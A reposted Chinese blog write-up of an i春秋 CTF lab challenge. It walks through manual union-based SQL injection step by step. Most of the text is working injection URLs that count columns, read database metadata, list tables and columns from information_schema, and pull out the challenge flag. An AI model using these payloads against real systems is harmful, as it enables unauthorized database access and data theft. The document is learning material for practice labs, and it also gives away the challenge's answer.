数据库
首页 > 数据库> > i春秋 从0到1CTFer成长之路-CTF中的SQL-1注入

i春秋 从0到1CTFer成长之路-CTF中的SQL-1注入

作者:互联网

这是本萌新第一次写博客,作为对前面的学习的总结。
如有错误,欢迎各位师傅们指正。
如何判断注入类型我就不做过多的解释,不知道同学请移步去学习(手动狗头)。

CTF中的SQL注入

我采用的是手注在这里插入图片描述
根据经验判断是字符型注入。
接下来就来查看有几列,order by后面依次跟1,2,3,4…当到4时页面查询失败,说明有3列。

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 3 %23

在这里插入图片描述

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=1' order by 4 %23

在这里插入图片描述

接下来就是查询数据库
我采用的是concat_ws()。

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1'  union select NULL,concat_ws(":",version(),database(),user()),NULL %23

在这里插入图片描述
得到note,还是root用户。
其中note的16进制为0x6e6f7465.
接下来爆表名.`

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1'  union select 1, table_name ,3 from information_schema.tables where table_schema=0x6e6f7465  limit 0,1 %23

在这里插入图片描述

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1'  union select 1, table_name ,3 from information_schema.tables where table_schema=0x6e6f7465  limit 1,2 %23

得到fl4g(0x666c3467) ,notes
接下来查列名

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1'  union select 1, column_name,3 from information_schema.columns where table_schema=0x6e6f7465 and table_name=0x666c3467 limit 0,1 %23

在这里插入图片描述

得到fllllag,只查到1个列,有点迷,先不管…
,先去看看 里面是什么。

http://eci-2ze96pvo7epn5uc0i8pa.cloudeci1.ichunqiu.com/index.php?id=-1' union select 1,2,fllllag from fl4g  %23

在这里插入图片描述
得到flag

n1book{union_select_is_so_cool}

标签:index,cloudeci1,1CTFer,2ze96pvo7epn5uc0i8pa,23,eci,CTF,SQL,com
来源: https://blog.csdn.net/qq_43399807/article/details/115221040